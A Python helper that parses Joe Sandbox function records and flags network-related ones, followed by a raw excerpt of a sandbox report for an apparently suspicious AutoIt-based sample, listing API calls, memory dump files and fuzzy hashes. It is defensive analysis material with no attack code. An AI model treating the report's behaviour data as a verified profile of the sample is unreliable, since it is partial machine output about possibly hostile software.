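"""Parse Joe Sandbox per-function records (APIs / Strings / Memory Dump Source /
Similarity blocks) into dicts and pick out records that touch the network.
Added example; not Joe Sandbox's own code."""
import re
from collections import Counter
from typing import Dict, List, Optional

# Constructed sample: three records in the layout used on this page, assembled
# from API lines that appear on the page (not a verbatim copy of one record).
# The "Download File" suffix is kept on purpose to show it being stripped.
SAMPLE_REPORT = """\
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0050544C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00505475
Strings
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Instruction Fuzzy Hash: 94119E70541A21BADF258F618884EEFBEA8FF12752F10862AF54556080F270A984DEB0
APIs
  • Part of subcall function 004CC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 004CC657
• GetWindowRect.USER32(00000000,?), ref: 00519775
• GetSysColor.USER32(00000012), ref: 0051978F
• _memset.LIBCMT ref: 004F5CF3
Strings
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
Strings
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
"""

SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"  # link text the web page appends to Associated lines

# One API line: optional "Part of subcall function XXXX:" prefix, Name.MODULE,
# optional "(args)", then ", ref: ADDR". The LIBCMT entries carry no parens.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")


def parse_records(text: str) -> List[Dict]:
    """Return one dict per function record: {"apis", "fields", "associated"}.
    A record starts at an "APIs" header and runs to the next one."""
    records: List[Dict] = []
    rec: Optional[Dict] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            rec = {"apis": [], "fields": {}, "associated": []}
            records.append(rec)
            section = "APIs"
            continue
        if rec is None:
            continue  # text before the first record
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                rec["apis"].append({
                    "name": m["name"], "module": m["module"], "ref": m["ref"],
                    "args": m["args"].split(",") if m["args"] is not None else [],
                    "subcall": m["sub"],  # None for a direct call
                })
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m["key"], m["val"]
        if val.endswith(LINK_RESIDUE):
            val = val[: -len(LINK_RESIDUE)]
        if key == "Associated":
            rec["associated"].append(val)
        else:
            rec["fields"][key] = val
    return records


# Assumption of this example: these modules and API-ID fragments mean networking.
NETWORK_MODULES = {"WININET", "WINHTTP", "WS2_32", "WSOCK32"}
NETWORK_ID_HINTS = ("internet", "htons", "inet_addr", "socket", "http")


def is_network_record(rec: Dict) -> bool:
    """Direct call into a network module, or (for records with no APIs listed,
    like the htons/inet_addr one) a Similarity API ID naming a network routine."""
    if any(a["module"] in NETWORK_MODULES and a["subcall"] is None for a in rec["apis"]):
        return True
    api_id = rec["fields"].get("API ID", "").lower()
    return any(hint in api_id for hint in NETWORK_ID_HINTS)


def network_records(records: List[Dict]) -> List[Dict]:
    return [r for r in records if is_network_record(r)]


def module_counts(records: List[Dict]) -> Dict[str, int]:
    """How many direct (non-subcall) API references each module gets."""
    return dict(Counter(a["module"] for r in records for a in r["apis"] if a["subcall"] is None))


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    print(len(recs), "records; direct calls per module:", module_counts(recs))
    for r in network_records(recs):
        print("network:", r["fields"]["API ID"], "| String ID:", r["fields"]["String ID"])
```

Run it against a saved copy of the report's function listing to get a per-module call histogram and the subset of records worth opening first; the String ID and Instruction Fuzzy Hash fields survive in `fields` so they can be carried into a hunting query without re-reading the page.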
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 004EC5E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1456604079-1403004172
                                                    • Opcode ID: cb859590799b8ce48d3b611ca548bd61d3e404fbf3c05f913529d5578acbfd05
                                                    • Instruction ID: b60727fbae51541f6c31436a6d6bdcf16f7cae8a266d04f6d90db866a9381da7
                                                    • Opcode Fuzzy Hash: cb859590799b8ce48d3b611ca548bd61d3e404fbf3c05f913529d5578acbfd05
                                                    • Instruction Fuzzy Hash: BF01F931501154ABCB04EB96CC919FF776AAB06311B140A1AF462A33C1DB7858099764
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: 41c600a1850bb2b9167cbe285e4e80419494bb3d3182f38a1526780a1427ba6e
                                                    • Instruction ID: 71ca61386ad2492a36181cb4d1d32907e07af16c7ae783b298bc3dd1e9610042
                                                    • Opcode Fuzzy Hash: 41c600a1850bb2b9167cbe285e4e80419494bb3d3182f38a1526780a1427ba6e
                                                    • Instruction Fuzzy Hash: 3A01F9719002187EDB18CB99C856FBE7BF89B05315F00415FE153D2281E478A708CB60
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 004EC4E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1456604079-1403004172
                                                    • Opcode ID: ed8034e342302d6d9e73dd783914a147082b438d5184650010b7500bc8f9beb9
                                                    • Instruction ID: d944da55ce0eb37d12f00b8a75131cb111d10511cbd648008a187963feecd047
                                                    • Opcode Fuzzy Hash: ed8034e342302d6d9e73dd783914a147082b438d5184650010b7500bc8f9beb9
                                                    • Instruction Fuzzy Hash: C801F771641108ABCB14EB92C9A2EFF77B99F05305F14001AB503E32C1DA585E09A279
                                                    APIs
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 004EC562
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1456604079-1403004172
                                                    • Opcode ID: 527b8abf7e2bd26e6b28b53959e2febbe98063bec851ca317af6b2e733c09d25
                                                    • Instruction ID: 31106e36211e2613e0224c8e62076931ffcdfe1a76f522171e7b0efd1ecac0ad
                                                    • Opcode Fuzzy Hash: 527b8abf7e2bd26e6b28b53959e2febbe98063bec851ca317af6b2e733c09d25
                                                    • Instruction Fuzzy Hash: 8D01A7716411187BCB14E796C992FFF77A95B15706F24041AB403E32C1DA589E0AA379
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp
                                                    • String ID: #32770
                                                    • API String ID: 2292705959-463685578
                                                    • Opcode ID: 4a17ca8f85e1ca572d9888847e76f365c65d41b08ca8cf8f82ee278c1f405d82
                                                    • Instruction ID: 6898743986aa1d32a2b9e79f8346bc544c099b604c5109f1225ba51691646f89
                                                    • Opcode Fuzzy Hash: 4a17ca8f85e1ca572d9888847e76f365c65d41b08ca8cf8f82ee278c1f405d82
                                                    • Instruction Fuzzy Hash: 05E0D13360022927D720DA55EC0AE97FB7DF751764F00001BF514D3141D7B4964587D4
                                                    APIs
                                                    • __umatherr.LIBCMT ref: 004DDA2A
                                                      • Part of subcall function 004DDD86: __ctrlfp.LIBCMT ref: 004DDDE5
                                                    • __ctrlfp.LIBCMT ref: 004DDA47
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __ctrlfp$__umatherr
                                                    • String ID: xnR
                                                    • API String ID: 219961500-3686307339
• Opcode ID: 3c1cf1dd0556efb6126c0bee8f7890bc4706f489f4f769aae79fa3c55190e43b
• Instruction ID: 749fd0049311397a8c89306f87b4dc058bdf9b5ee470f2f306693c168a8086d8
• Opcode Fuzzy Hash: 3c1cf1dd0556efb6126c0bee8f7890bc4706f489f4f769aae79fa3c55190e43b
• Instruction Fuzzy Hash: 02E0657140860AAADF017F81E8066A93BA5EF14314F80409AF58C14296DFB645B4D75B
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004EB36B
  • Part of subcall function 004D2011: _doexit.LIBCMT ref: 004D201B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: a5d58e5f26ca8e0d0d8a4610d3daf4d7fd73777ee3480a6dc14606eb0974c406
• Instruction ID: 23918a4c35ebe6d1b2a2f341bd5f4da05ae20368e8c60a6df1bec1883508dafd
• Opcode Fuzzy Hash: a5d58e5f26ca8e0d0d8a4610d3daf4d7fd73777ee3480a6dc14606eb0974c406
• Instruction Fuzzy Hash: D7D05B3138475833D21636967D17FCA7A9C9F55B96F00001BFF08A66D28ADA94C051FD
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 0052BAB8
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0052BCAB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: DirectoryFreeLibrarySystem
• String ID: WIN_XPe
• API String ID: 510247158-3257408948
• Opcode ID: f9995ed16254ea3fbed9794f4ed8992ae512daa02e87cd55665e4f07fce47fb5
• Instruction ID: 2a4a67332ae16ce9bb9d5203dd33d3b81d513db322c32a41af014d419a45e40d
• Opcode Fuzzy Hash: f9995ed16254ea3fbed9794f4ed8992ae512daa02e87cd55665e4f07fce47fb5
• Instruction Fuzzy Hash: 8CE0C970C0411DEFDB15DBA9E84AAEDBBB8BF69300F148886E026B2190C7715A45EF25
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005184DF
• PostMessageW.USER32(00000000), ref: 005184E6
  • Part of subcall function 004F8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F83CD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 01a526d8108c01f07eeee1d191c7a056ea447f7cbd75e0f67f78d6c258c066bf
• Instruction ID: 1d9a92c5a4d55f6999763b2be84c9fdcdf2ab7d8792a51de7c44ddb7937d75ef
• Opcode Fuzzy Hash: 01a526d8108c01f07eeee1d191c7a056ea447f7cbd75e0f67f78d6c258c066bf
• Instruction Fuzzy Hash: A1D0C9723843147BE765A770EC4BFD66A64AB28B11F0409297759AA2D0C9E4B8148664
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0051849F
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005184B2
  • Part of subcall function 004F8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004F83CD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 28de0a37c521e3aff6985ea5303f51353dce190a87b56e5cbcab5f03677432e2
• Instruction ID: 13a314063739cfa08ca9dd9a7a77b57296db9b7eca4696f3a4a475b279d6250f
• Opcode Fuzzy Hash: 28de0a37c521e3aff6985ea5303f51353dce190a87b56e5cbcab5f03677432e2
• Instruction Fuzzy Hash: 36D0C976384314B7E764A770EC4BFD66A64AB24B11F0409297759AA2D0C9E4A8148664